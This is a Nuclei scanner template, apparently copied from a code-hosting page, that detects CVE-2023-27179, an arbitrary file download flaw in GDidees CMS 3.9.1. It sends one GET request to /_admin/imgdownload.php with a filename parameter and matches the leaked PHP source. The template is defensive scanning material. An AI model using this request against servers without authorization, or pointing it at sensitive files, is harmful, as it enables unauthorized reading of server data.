56 lines
1.9 KiB
YAML
56 lines
1.9 KiB
YAML
id: CVE-2023-27179
|
|
|
|
info:
|
|
name: GDidees CMS v3.9.1 - Arbitrary File Download
|
|
author: theamanrawat
|
|
severity: high
|
|
description: |
|
|
GDidees CMS v3.9.1 and lower was discovered to contain an arbitrary file download vulenrability via the filename parameter at /_admin/imgdownload.php.
|
|
impact: |
|
|
An attacker can exploit this vulnerability to download arbitrary files from the server.
|
|
remediation: |
|
|
Apply the latest patch or upgrade to a newer version of GDidees CMS.
|
|
reference:
|
|
- https://www.gdidees.eu/cms-1-0.html
|
|
- https://gist.github.com/Hadi999/516aa25b953b0cba57089a0c11b1305b
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-27179
|
|
- http://packetstormsecurity.com/files/171894/GDidees-CMS-3.9.1-Local-File-Disclosure-Directory-Traversal.html
|
|
- https://knowledge-base.secureflag.com/vulnerabilities/unrestricted_file_download/unrestricted_file_download_vulnerability.html
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.5
|
|
cve-id: CVE-2023-27179
|
|
cwe-id: CWE-434
|
|
epss-score: 0.01929
|
|
epss-percentile: 0.8731
|
|
cpe: cpe:2.3:a:gdidees:gdidees_cms:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
vendor: gdidees
|
|
product: gdidees_cms
|
|
tags: packetstorm,cve,cve2023,file-download,gdidees,lfr
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/_admin/imgdownload.php?filename=imgdownload.php"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- '$filename=$_GET["filename"];'
|
|
- '@readfile($filename) OR die();'
|
|
condition: and
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- 'application/force-download'
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 490a0046304402202b5fa48254aa4449e0dd2a068e23b74adf62f478db5edfad0d80faba7d817e3f022058bbbd39a23f4a6ece6f75433077fbe66ac0518903295cdb8142b97329c75834:922c64590222798bb761d5b6d8e72950 |